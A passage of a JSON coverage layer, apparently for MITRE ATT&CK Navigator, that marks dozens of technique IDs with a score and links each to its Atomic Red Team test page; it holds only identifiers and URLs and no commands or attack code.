,{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"},{"techniqueID":"T1098.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanar